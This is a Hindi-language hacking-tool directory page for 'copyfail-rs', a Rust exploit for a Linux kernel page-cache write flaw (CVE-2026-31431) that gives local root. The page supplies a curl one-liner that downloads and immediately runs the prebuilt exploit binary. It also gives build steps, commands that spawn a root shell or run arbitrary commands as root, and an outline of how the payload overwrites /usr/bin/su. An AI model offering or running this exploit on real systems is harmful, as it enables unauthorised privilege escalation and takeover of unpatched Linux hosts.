Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
copyfail-rs — कॉपी फेल एक्सप्लॉइट (CVE-2026-31431) लेकिन Rust में। | Kitploit
उपकरण/GitHubGitHub/sammwyy/copyfail-rs
विशेषाधिकार वृद्धिशोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणपेलोड डेवलपमेंटबाइनरी शोषण
GitHubsammwyy/copyfail-rs

copyfail-rs

कॉपी फेल एक्सप्लॉइट (CVE-2026-31431) लेकिन Rust में।

रिपॉजिटरी देखें
1423 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

copyfail-rs

कॉपी फेल एक्सप्लॉइट (CVE-2026-31431) लेकिन रस्ट में, एक गंभीर कमजोरी जो AF_ALG और splice() को जोड़कर 4-बाइट पेज कैश राइट प्राप्त करती है, जिससे प्रमुख लिनक्स वितरणों पर स्थानीय विशेषाधिकार वृद्धि होती है।

Xint Code के शोध और PoC पर आधारित।

अस्वीकरण

[!CAUTION] यह प्रोजेक्ट केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। उन सिस्टमों पर इस एक्सप्लॉइट को चलाना जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है। इस कोड का उपयोग जिम्मेदारी से करें ताकि समान कमजोरियों को समझा और उनसे बचाव किया जा सके।

विशेषताएँ

  • शुद्ध रस्ट: मूल पायथन PoC का उच्च-प्रदर्शन, मेमोरी-सुरक्षित कार्यान्वयन।
  • डायनेमिक ELF बिल्डर: रनटाइम पर एक्सप्लॉइट पेलोड को प्रोग्रामेटिक रूप से निर्मित करता है, जिससे कस्टम कमांड की अनुमति मिलती है।
  • ज़ीरो-कॉपी एक्सप्लॉइटेशन: libc के माध्यम से सीधे लिनक्स कर्नेल के AF_ALG और splice() सिस्कॉल के साथ इंटरैक्ट करता है।
  • अनुकूलन योग्य: CLI तर्कों के माध्यम से वह कमांड निर्दिष्ट करें जिसे आप रूट के रूप में चलाना चाहते हैं।

त्वरित प्रारंभ (एक-लाइनर)

आप पूर्व-संकलित PoC बाइनरी को सीधे डाउनलोड और चला सकते हैं:

root@kitploit:~
curl -L https://github.com/sammwyy/copyfail-rs/releases/download/poc/copyfail-rs_x86-64 -o copyfail-rs && chmod +x copyfail-rs && ./copyfail-rs

पूर्वापेक्षाएँ

  • CVE-2026-31431 के लिए संवेदनशील लिनक्स कर्नेल (आमतौर पर अप्रैल 2026 में पैच से पहले के कर्नेल)।
  • पढ़ने की अनुमति वाली लक्ष्य बाइनरी तक पहुंच (डिफ़ॉल्ट /usr/bin/su है)।

स्थापना

रिपॉजिटरी को क्लोन करें और बाइनरी बनाएं:

root@kitploit:~
git clone https://github.com/sammwyy/copyfail-rs.git
cd copyfail-rs
cargo build --release

उपयोग

बिना तर्कों के एक्सप्लॉइट चलाएं ताकि डिफ़ॉल्ट रूप से /bin/sh का उपयोग हो:

root@kitploit:~
./target/release/copyfail-rs

या रूट के रूप में चलाने के लिए एक कस्टम कमांड निर्दिष्ट करें:

root@kitploit:~
./target/release/copyfail-rs "whoami > /tmp/pwned"

यह कैसे काम करता है

एक्सप्लॉइट लिनक्स कर्नेल के क्रिप्टो API (AF_ALG) के भीतर authencesn कार्यान्वयन में एक बग का लाभ उठाता है। MSG_MORE के साथ sendmsg और splice() को जोड़कर, मनमानी फ़ाइलों (जैसे /usr/bin/su) के पेज कैश के छोटे हिस्सों को दुर्भावनापूर्ण ELF पेलोड के साथ अधिलेखित करना संभव है।

  1. सॉकेट सेटअप: एक AF_ALG सॉकेट बनाता है और authencesn(hmac(sha256),cbc(aes)) से बांधता है।
  2. पेलोड जनरेशन: मेमोरी में एक न्यूनतम ELF निर्मित करता है जो रूट विशेषाधिकारों के साथ लक्ष्य कमांड को निष्पादित करता है।
  3. कैश इंजेक्शन: AF_ALG कमजोरी का उपयोग करके पेलोड को लक्ष्य फ़ाइल के पेज कैश में पुनरावृत्त रूप से स्प्लाइस करता है।
  4. ट्रिगर: संशोधित लक्ष्य फ़ाइल को निष्पादित करता है, इंजेक्टेड शेलकोड चलाता है।

संदर्भ

  • मूल ब्लॉग पोस्ट - Xint Code
  • CVE-2026-31431 विवरण
टूल डाउनलोड करें